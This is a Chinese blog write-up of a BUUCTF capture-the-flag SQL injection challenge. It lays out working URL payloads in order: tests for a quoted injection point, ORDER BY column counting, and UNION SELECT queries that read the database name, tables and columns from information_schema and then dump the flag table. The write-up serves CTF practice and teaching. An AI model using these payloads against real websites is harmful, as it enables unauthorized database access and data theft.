BUUCTF [第一章 web入门]SQL注入-1

仲瑿

已于 2022-10-17 09:14:28 修改

阅读量6.2k

点赞数 4

分类专栏： CTF 文章标签： CTF

于 2022-04-08 18:16:21 首次发布

本文链接：https://blog.csdn.net/m0_49025459/article/details/124044499

版权

SQL注入字符型注入数据库名联合查询信息泄露

关键词由CSDN通过智能技术生成

CTF 专栏收录该内容

95 篇文章

订阅专栏

博客内容涉及了SQL注入攻击的识别和利用，通过字符型注入点验证，确定了存在注入漏洞。接着通过测试判断字段数量为三位，并利用联合查询获取了数据库名为'note'。进一步探测到表格'fl4g'和'notes'，最终在'fl4g'表中找到关键信息，揭示了可能存在的安全风险。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

题目

先找注入点，看一url

发现了？id=1 测试一下是字符型注入还是数字型注入

分别对url进行如下修改，发现页面没有变化，证明不是数字型注入

id=1 and 1 = 1--+
id=1 and 1 = 2--+

分别对url进行如下修改

id=1' and 1 = 1--+
id=1' and 1 = 2--+

在更改url为第二个的时候，发现页面出现错误，证明存在字符型注入点

判断字符段的数量

id=1' order by 3 --+
id=1' order by 4 --+

输入id=1' order by 3 --+产生的回显

输入id=1' order by 4 --+ 未产生的回显

证明字段数为三位

用联合查询查一下数据库名

?id=-1' union select 1,database(),3 --+

数据库名就为note

查表名

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
或者
?id=4' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

看看这些表里都有什么

fl4g表

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+

notes表

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='notes'--+

大概率flag在fl4g表里，看看表里有什么

?id=-4' union select 1,database(), group_concat(fllllag) from fl4g --+

flag出现了